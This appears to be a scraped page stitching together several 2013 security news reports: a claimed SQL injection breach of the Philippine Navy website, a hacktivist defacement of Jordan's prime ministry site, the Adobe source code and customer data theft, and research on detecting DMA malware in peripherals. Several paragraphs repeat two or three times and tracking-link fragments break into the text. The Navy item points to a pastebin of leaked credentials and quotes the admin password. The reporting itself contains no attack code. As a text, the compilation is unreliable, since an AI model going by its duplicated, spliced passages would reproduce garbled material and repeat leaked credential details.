In a pastebin post(pastebin.com/5xhP6zft), hackers leaked the login credentials compromised from the database.  It includes the Admin login credentials.  What's worse is that they are using very weak username and password.

They have used the "userpassword" as password.  Even if there is no bug, hacker could have guessed the password or get the password by brute-forcing. It is sad to know that the Navy website itself has poor security and weak passwords. - See more at: http://www.ehackingnews.com/2013/07/philippines-navy-website-hacked-by-pr3.html#sthash.TkddhcNp.dpuf

A Hacker with handle "Pr3 H4ck3r" from Philippine Cyber Army has claimed to have hacked into the database of the Navy website.

According to hacker's statement, he compromised the data by exploiting the SQL Injection vulnerability in the Navy's "BRP Alcaraz blog" page (navy.mil.ph/alcaraz).

However, we are not able to access the given link at the time of writing. It appears the admin has taken down the link.  The news was first reported by local hacking news site PinoyHackNews.

In a pastebin post(pastebin.com/5xhP6zft), hackers leaked the login credentials compromised from the database.  It includes the Admin login credentials.  What's worse is that they are using very weak username and password.

They have used the "userpassword" as password.  Even if there is no bug, hacker could have guessed the password or get the password by brute-forcing. It is sad to know that the Navy website itself has poor security and weak passwords.

Jordan's PM's website hacked by Anonymous hacktivist

Anonymous hacktivists have hacked into official website of Jordan's Prime ministry in a protest against raising taxes and prices.  The website was defaced with a message in Arabic to Prime Minister Abdullah Nsur.

"Hi uncle, how are you? We are sorry, we hacked your website. Are you upset? We feel much worse when you raise prices. The people know this feeling but you do not," the defacement message reads.

According to Voice of Russia report, the website has been restored after it was hacked for several hours.  The official claimed to have identified the attackers.

Anonymous hacktivists have hacked into official website of Jordan's Prime ministry in a protest against raising taxes and prices.  The website was defaced with a message in Arabic to Prime Minister Abdullah Nsur.

"Hi uncle, how are you? We are sorry, we hacked your website. Are you upset? We feel much worse when you raise prices. The people know this feeling but you do not," the defacement message reads.

According to Voice of Russia report, the website has been restored after it was hacked for several hours.  The official claimed to have identified the attackers.
- See more at: http://www.ehackingnews.com/2013/09/jordans-pms-website-hacked-by-anonymous.html#sthash.mo3saBvT.dpuf

Anonymous hacktivists have hacked into official website of Jordan's Prime ministry in a protest against raising taxes and prices.  The website was defaced with a message in Arabic to Prime Minister Abdullah Nsur.

"Hi uncle, how are you? We are sorry, we hacked your website. Are you upset? We feel much worse when you raise prices. The people know this feeling but you do not," the defacement message reads.

According to Voice of Russia report, the website has been restored after it was hacked for several hours.  The official claimed to have identified the attackers.
- See more at: http://www.ehackingnews.com/2013/09/jordans-pms-website-hacked-by-anonymous.html#sthash.mo3saBvT.dpufAnonymous hacktivists have hacked into official website of Jordan's Prime ministry in a protest against raising taxes and prices.  The website was defaced with a message in Arabic to Prime Minister Abdullah Nsur.

"Hi uncle, how are you? We are sorry, we hacked your website. Are you upset? We feel much worse when you raise prices. The people know this feeling but you do not," the defacement message reads.

According to Voice of Russia report, the website has been restored after it was hacked for several hours.  The official claimed to have identified the attackers.

Adobe To Announce Source Code, Customer Data Breach

Adobe Systems Inc. is expected to announce today that hackers broke into its network and stole source code for an as-yet undetermined number of software titles, including its ColdFusion Web application platform, and possibly its Acrobat family of products. The company said hackers also accessed nearly three million customer credit card records, and stole login data for an undetermined number of Adobe user accounts.

A screen shot of purloined source code stolen from Adobe, shared with the company by KrebsOnSec

KrebsOnSecurity first became aware of the source code leak roughly one week ago, when this author — working in conjunction with fellow researcher Alex Holden, CISO of Hold Security LLC — discovered a massive 40 GB source code trove stashed on a server used by the same cyber criminals believed to have hacked into major data aggregators earlier this year, including LexisNexis, Dun & Bradstreet and Kroll. The hacking team’s server contained huge repositories of uncompiled and compiled code that appeared to be source code for ColdFusion and Adobe Acrobat.
Shortly after that discovery, KrebsOnSecurity shared several screen shots of the code repositories with Adobe. Today, Adobe responded with confirmation that it has been working on an investigation into a potentially broad-ranging breach into its networks since Sept. 17, 2013.
In an interview with this publication earlier today, Adobe confirmed that the company believes that hackers accessed a source code repository sometime in mid-August 2013, after breaking into a portion of Adobe’s network that handled credit card transactions for customers. Adobe believes the attackers stole credit card and other data on approximately 2.9 million customers, and that the bad guys also accessed an as-yet-undetermined number of user names and passwords that customers use to access various parts of the Adobe customer network.

ColdFusion source code repository found on hacker’s server.

Adobe said the credit card numbers were encrypted and that the company does not believe decrypted credit card numbers left its network. Nevertheless, the company said that later today it will begin the process of notifying affected customers — which include many Revel and Creative Cloud account users —  via email that they need to reset their passwords.
In an interview prior to sending out a news alert on the company’s findings, Adobe’s Chief Security Officer Brad Arkin said the information shared by this publication “helped steer our investigation in a new direction.” Arkin said the company has undertaken a rigorous review of the ColdFusion code shipped since the code archive was compromised, and that it is confident that the source code for ColdFusion code that shipped following the incident “maintained its integrity.”
“We are in the early days of what we expect will be an extremely long and thorough response to this incident,” Arkin said. The company is expected to publish an official statement this afternoon outlining the broad points of its investigation so far.
Arkin said Adobe is still in the process of determining what source code for other products may have been accessed by the attackers, and conceded that Adobe Acrobat may have been among the products the bad guys touched. Indeed, one of the screen shots this publication shared with Adobe indicates that the attackers also had access to Acrobat code, including what appears to be code for as-yet unreleased Acrobat components (see screen grab above).
“We’re still at the brainstorming phase to come up with ways to provide higher level of assurance for the integrity of our products, and that’s going to be a key part of our response,” Arkin said. He noted that the company was in the process of looking for anomalous check-in activity on its code repositories and for other things that might seem out of place.
“We are looking at malware analysis and exploring the different digital assets we have. Right now the investigation is really into the trail of breadcrumbs of where the bad guys touched.”
The revelations come just two days after KrebsOnSecurity published a story indicating that the same attackers apparently responsible for this breach were also involved in the intrusions into the  networks of the National White Collar Crime Center (NW3C), a congressionally-funded non-profit organization that provides training, investigative support and research to agencies and entities involved in the prevention, investigation and prosecution of cybercrime. As noted in that story, the attackers appear to have initiated the intrusion into the NW3C using a set of attack tools that leveraged security vulnerabilities in Adobe’s ColdFusion Web application server.
While Adobe many months ago issued security updates to plug all of the ColdFusion vulnerabilities used by the attackers, many networks apparently run outdated versions of the software, leaving them vulnerable to compromise. This indeed may have also been the vector that attackers used to infiltrate Adobe’s own networks; Arkin said the company has not yet determined whether the servers that were breached were running ColdFusion, but acknowledged that the attackers appear to have gotten their foot in the door through “some type of out-of-date” software.
Stay tuned for further updates on this rapidly-moving story.

Research detects dangerous malware hiding in peripherals

A Berlin researcher has demonstrated the capability to detect previously undetectable stealthy malware that resides in graphics and network cards.
Patrick Stewin's proof of concept demonstrated that a detector could be built to find the sophisticated malware that ran on dedicated devices and attacked direct memory access (DMA).
The attacks launched by the malware dubbed DAGGER targeted host runtime memory using DMA provided to hardware devices. These attacks were not within scope of antimalware systems and therefore not detected.

DAGGER, also developed by Stewin and Iurii Bystrov of the FGSect Technical University of Berlin research group, attacked 32bit and 64bit Windows and Linux systems and could bypass memory address randomisation.
After beginning life last year as a keylogger, DAGGER has recently been upgraded with new functionality and now included the ability to update its attack behaviour during runtime via an out-of-band channel.
"DMA malware is stealthy to a point where the host cannot detect its presence," Stewin said.
In a paper Stewin will present next month, he said the DMA attacks were both dangerous and undetectable. (pdf)

"DMA-based attacks launched from peripherals are capable of compromising the host without exploiting vulnerabilities present in the operating system running on the host.
"Therefore they present a highly critical threat to system security and integrity. Unfortunately,to date no OS (operating system) implements security mechanisms that can detect DMA-based attacks. Furthermore, attacks against memory management units have been demonstrated in the past and therefore cannot be considered trustworthy."

The German Government funded research was closing in on its aim to develop a reliable detector for DMA malware.
"At the moment we have a proof-of-concept that proves that a detector is possible," Stewin said in an email to SC. "It can find DAGGER."
The proof-of-concept was based on a runtime monitor dubbed BARM which modelled and compared expected memory bus activity to the resulting activity, meaning malware residing on peripherals would be detected.
Stewin said the detector would not significantly drain compute resources.
Some detectors had been previously developed but they required that peripherals be modified or that a special debug feature exist.
The researchers aimed to develop the proof of concept into a detector that did not require modification.
The pair would present the research paper "A Primitive for Revealing Stealthy Peripheral-based Attacks on the Computing Platform's Main Memory" at the 16th International Symposium on Research in Attacks, Intrusions and Defenses in October in Saint Lucia.